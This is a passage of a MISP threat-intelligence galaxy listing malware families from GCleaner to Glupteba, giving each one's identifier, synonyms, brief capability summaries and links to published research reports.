- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
- https://github.com/eset/malware-ioc/tree/master/turla - webarchive
- https://securelist.com/introducing-whitebear/81638/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html - webarchive
- https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf - webarchive
- https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GCleaner
Internal MISP references
UUID 874d6868-08fd-4b66-877d-fd2174f0d275
which can be used as unique global reference for GCleaner
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://bazaar.abuse.ch/browse/signature/GCleaner/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
gcman
Internal MISP references
UUID ed0586d1-4ff0-4d39-87c7-1414f600d16e
which can be used as unique global reference for gcman
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gdrive
According to Unit 42, this is a .NET X64 malware that is capable of interaction with GoogleDrive, allowing an attacker to have victim information uploaded and payloads delivered.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gdrive.
Known Synonyms |
---|
DoomDrive |
GoogleDriveSucks |
Internal MISP references
UUID 61c90604-d0f6-437c-920a-f1d6d9f76c55
which can be used as unique global reference for Gdrive
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gdrive - webarchive
- https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/ - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf - webarchive
- https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GearInformer
Internal MISP references
UUID 5e699f4d-9ff6-49dd-bc04-797f0ab2e128
which can be used as unique global reference for GearInformer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GEARSHIFT
According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.
Internal MISP references
UUID 06d80b50-703a-4cf9-989e-b8b1bf71144a
which can be used as unique global reference for GEARSHIFT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GEMCUTTER
According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.
Internal MISP references
UUID e46ae329-a619-4cfc-8059-af326c11ee79
which can be used as unique global reference for GEMCUTTER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GeminiDuke
Internal MISP references
UUID f3a4863f-1acd-4476-a8c7-1d4c162426e0
which can be used as unique global reference for GeminiDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Get2
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Get2.
Known Synonyms |
---|
FRIENDSPEAK |
GetandGo |
Internal MISP references
UUID f6aa0163-bde3-44a2-8acc-3e7a04cf167d
which can be used as unique global reference for Get2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.get2 - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update - webarchive
- https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7 - webarchive
- https://github.com/Tera0017/TAFOF-Unpacker - webarchive
- https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://intel471.com/blog/ta505-get2-loader-malware-december-2020/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104 - webarchive
- https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546 - webarchive
- https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md - webarchive
- https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.goggleheadedhacker.com/blog/post/13 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GetMail
Internal MISP references
UUID 6f155c95-3090-4730-8d3b-0b246162a83a
which can be used as unique global reference for GetMail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GetMyPass
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GetMyPass.
Known Synonyms |
---|
getmypos |
Internal MISP references
UUID d77eacf7-090f-4cf6-a305-79a372241158
which can be used as unique global reference for GetMyPass
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass - webarchive
- https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md - webarchive
- https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
get_pwd
Internal MISP references
UUID a762023d-8d46-43a8-be01-3b2362963de0
which can be used as unique global reference for get_pwd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gh0stBins
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gh0stBins.
Known Synonyms |
---|
Gh0stBins RAT |
Internal MISP references
UUID 07ef4b03-c512-490c-905a-f7c2e3a47eba
which can be used as unique global reference for Gh0stBins
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gh0stTimes
Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.
Internal MISP references
UUID 9c89baf1-9639-4990-b218-14680170944f
which can be used as unique global reference for Gh0stTimes
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GHAMBAR
According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.
Internal MISP references
UUID 4b9216e7-3a64-4b2e-97fd-54697d87cb72
which can be used as unique global reference for GHAMBAR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ghole
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghole.
Known Synonyms |
---|
CoreImpact (Modified) |
Gholee |
Internal MISP references
UUID ef4383f6-29fd-4b06-9a1f-b788567fd8fd
which can be used as unique global reference for Ghole
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole - webarchive
- https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf - webarchive
- http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf - webarchive
- https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostEmperor
Internal MISP references
UUID 968e52d1-e1d1-499a-acdc-b21522646e28
which can be used as unique global reference for GhostEmperor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor - webarchive
- https://www.sygnia.co/blog/ghost-emperor-demodex-rootkit/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf - webarchive
- https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit - webarchive
- https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.ghostengine
Internal MISP references
UUID 2ead704c-d486-4127-b86a-5a409cc0f5d7
which can be used as unique global reference for win.ghostengine
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostengine - webarchive
- https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar - webarchive
- https://www.darkreading.com/cyberattacks-data-breaches/novel-edr-killing-ghostengine-malware-stealth - webarchive
- https://www.elastic.co/security-labs/invisible-miners-unveiling-ghostengine - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gh0stnet
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gh0stnet.
Known Synonyms |
---|
Remosh |
Internal MISP references
UUID e1410684-c695-4c89-ae5f-80ced136afbd
which can be used as unique global reference for Gh0stnet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet - webarchive
- https://en.wikipedia.org/wiki/GhostNet - webarchive
- https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf - webarchive
- https://www.nartv.org/2019/03/28/10-years-since-ghostnet/ - webarchive
- http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostSocks
GhostSocks, a Golang-based proxy malware, was first advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in October 2023. It uses back-connect SOCKS5 (Socket Secure) proxy connections and is available for rent for US $100 per month. In February 2024, the author of Lumma Stealer released an update introducing integrated proxying capabilities. This feature, developed in partnership with GhostSocks, allows infected hosts to be used as SOCKS5 proxies and is available to all subscribers on the "Professional" or higher tier plan. The integration allows Lumma Stealer users to establish a network of residential IP addresses for various purposes, including credential checking, spam distribution, or use as general-purpose proxies.
Internal MISP references
UUID 3b22582f-17fc-44d9-8218-f6c7b0ccf3c5
which can be used as unique global reference for GhostSocks
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostAdmin
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostAdmin.
Known Synonyms |
---|
Ghost iBot |
Internal MISP references
UUID 6201c337-1599-4ced-be9e-651a624c20be
which can be used as unique global reference for GhostAdmin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostLocker
Internal MISP references
UUID 9b050f86-edad-40ed-9a93-b7c03444bfa5
which can be used as unique global reference for GhostLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ghost RAT
According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.
Below is a list of Gh0st RAT capabilities:
- Take full control of the remote screen on the infected bot.
- Provide real-time as well as offline keystroke logging.
- Provide a live feed of the webcam and microphone of the infected host.
- Download remote binaries onto the infected remote host.
- Take control of remote shutdown and reboot of the host.
- Disable the infected computer's pointer and keyboard input remotely.
- Enter the shell of the remote infected host with full control.
- Provide a list of all the active processes.
- Clear the SSDT of all existing hooks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghost RAT.
Known Synonyms |
---|
Farfli |
Gh0st RAT |
PCRat |
Internal MISP references
UUID 225fa6cf-dc9c-4b86-873b-cdf1d9dd3738
which can be used as unique global reference for Ghost RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/ - webarchive
- https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2 - webarchive
- https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-edison - webarchive
- https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://blog.talosintelligence.com/2019/09/panda-evolution.html - webarchive
- https://asec.ahnlab.com/en/32572/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://www.prevailion.com/the-gh0st-remains-the-same-2/ - webarchive
- https://hackcon.org/uploads/327/05%20-%20Kwak.pdf - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/ - webarchive
- https://www.youtube.com/watch?v=uakw2HMGZ-I - webarchive
- https://unit42.paloaltonetworks.com/operation-diplomatic-specter/ - webarchive
- https://attack.mitre.org/groups/G0026 - webarchive
- https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf - webarchive
- https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41 - webarchive
- https://s.tencent.com/research/report/836.html - webarchive
- https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure - webarchive
- https://www.intezer.com/blog-chinaz-relations/ - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.intezer.com/blog/malware-analysis/chinaz-relations/ - webarchive
- https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- http://www.malware-traffic-analysis.net/2018/01/04/index.html - webarchive
- https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new - webarchive
- https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/ - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
- http://www.nartv.org/mirror/ghostnet.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/iron-taurus/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats - webarchive
- https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf - webarchive
- https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report - webarchive
- http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf - webarchive
- https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox - webarchive
- https://blog.cylance.com/the-ghost-dragon - webarchive
- https://risky.biz/whatiswinnti/ - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://www.datanet.co.kr/news/articleView.html?idxno=133346 - webarchive
- https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html - webarchive
- https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html - webarchive
- https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/ - webarchive
- https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html - webarchive
- https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html - webarchive
- http://www.hexblog.com/?p=1248 - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack - webarchive
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/ - webarchive
- https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-globe - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-fleetwood - webarchive
- https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostSecret
Internal MISP references
UUID 0b317327-6783-441f-8634-388599cbbff6
which can be used as unique global reference for GhostSecret
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gibberish
Ransomware.
Internal MISP references
UUID f561656c-19d1-4b07-a193-3293d053e774
which can be used as unique global reference for Gibberish
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Giffy
Internal MISP references
UUID 6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d
which can be used as unique global reference for Giffy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GIMMICK (Windows)
Internal MISP references
UUID 59e8424b-f2e6-4542-bbb3-0e62a4596a01
which can be used as unique global reference for GIMMICK (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gimmick - webarchive
- http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf - webarchive
- https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ - webarchive
- https://hitcon.org/2023/CMT/slide/Unmasking%20CamoFei_An%20In-depth%20Analysis%20of%20an%20Emerging%20APT%20Group%20Focused%20on%20Healthcare%20Sectors%20in%20East%20Asia.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ginwui
Internal MISP references
UUID 7f768705-d852-4c66-a7e0-76fd5016d07f
which can be used as unique global reference for Ginwui
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ginzo Stealer
An information stealer written in .NET.
Internal MISP references
UUID 0edf6463-908a-4c3a-861d-70337c9f67bd
which can be used as unique global reference for Ginzo Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ginzo - webarchive
- https://www.gdatasoftware.com/blog/2022/03/ginzo-free-malware - webarchive
- https://twitter.com/struppigel/status/1506933328599044100 - webarchive
- https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf - webarchive
- https://blog.talosintelligence.com/haskers-gang-zingostealer/ - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Glasses
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Glasses.
Known Synonyms |
---|
Wordpress Bruteforcer |
Internal MISP references
UUID 1c27b1a3-ea2a-45d2-a982-12e1509aa4ad
which can be used as unique global reference for Glasses
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlassRAT
Internal MISP references
UUID d9e6adf2-4f31-48df-a7ef-cf25d299f68c
which can be used as unique global reference for GlassRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlitchPOS
Internal MISP references
UUID d2e0cbfb-c647-48ec-84e2-ca2199cf7d03
which can be used as unique global reference for GlitchPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlobeImposter
GlobeImposter is a ransomware application which is mainly distributed via "blank slate" spam (the spam has no message content, only an attached ZIP file), exploits, malicious advertising, fake updates, and repacked installers. GlobeImposter mimics the Globe ransomware family. This malware may prevent execution of anti-virus solutions and other OS-related security features and may prevent system restoration.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GlobeImposter.
Known Synonyms |
---|
Fake Globe |
Internal MISP references
UUID 73806c57-cef8-4f7b-a78b-7949ef83b2c2
which can be used as unique global reference for GlobeImposter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter - webarchive
- https://asec.ahnlab.com/ko/30284/ - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run - webarchive
- https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://isc.sans.edu/diary/23417 - webarchive
- https://www.emsisoft.com/ransomware-decryption-tools/globeimposter - webarchive
- https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
- https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/ - webarchive
- https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet - webarchive
- https://asec.ahnlab.com/en/48940/ - webarchive
- https://blog.ensilo.com/globeimposter-ransomware-technical - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Globe
Internal MISP references
UUID de8e204c-fb65-447e-92bd-200e1c39648c
which can be used as unique global reference for Globe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlooxMail
Internal MISP references
UUID 18208674-fe8c-447f-9e1d-9ff9a64b2370
which can be used as unique global reference for GlooxMail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Glupteba
Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Internal MISP references
UUID 978cfb82-5fe9-46d2-9607-9bcdfeaaa58c
which can be used as unique global reference for Glupteba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba - webarchive
- https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/ - webarchive
- https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/ - webarchive
- https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ - webarchive
- https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- http://resources.infosecinstitute.com/tdss4-part-1/ - webarchive
- https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/ - webarchive
- https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign - webarchive
- https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf - webarchive
- https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html - webarchive
- https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html - webarchive
- https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Uncovering-a-broad-criminal-ecosystem-Glupteba.pdf - webarchive
- https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter - webarchive
- https://www.youtube.com/watch?v=5Gz6_I-wl0E - webarchive
- https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/ - webarchive
- https://estr3llas.github.io/gluptebas-dotnet-dropper-deep-dive/ - webarchive
- https://habr.com/ru/company/solarsecurity/blog/578900/ - webarchive
- https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Uncovering-a-broad-criminal-ecosystem-powered-by-one-of-the-largest-botnets-Glupteba.pdf - webarchive
- https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728 - webarchive
- https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ - webarchive
- https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html - webarchive
- https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/ - webarchive
- https://community.riskiq.com/article/2a36a7d2/description - webarchive
- https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451 - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf - webarchive
- https://labs.k7computing.com/?p=22319 - webarchive
Associated metadata
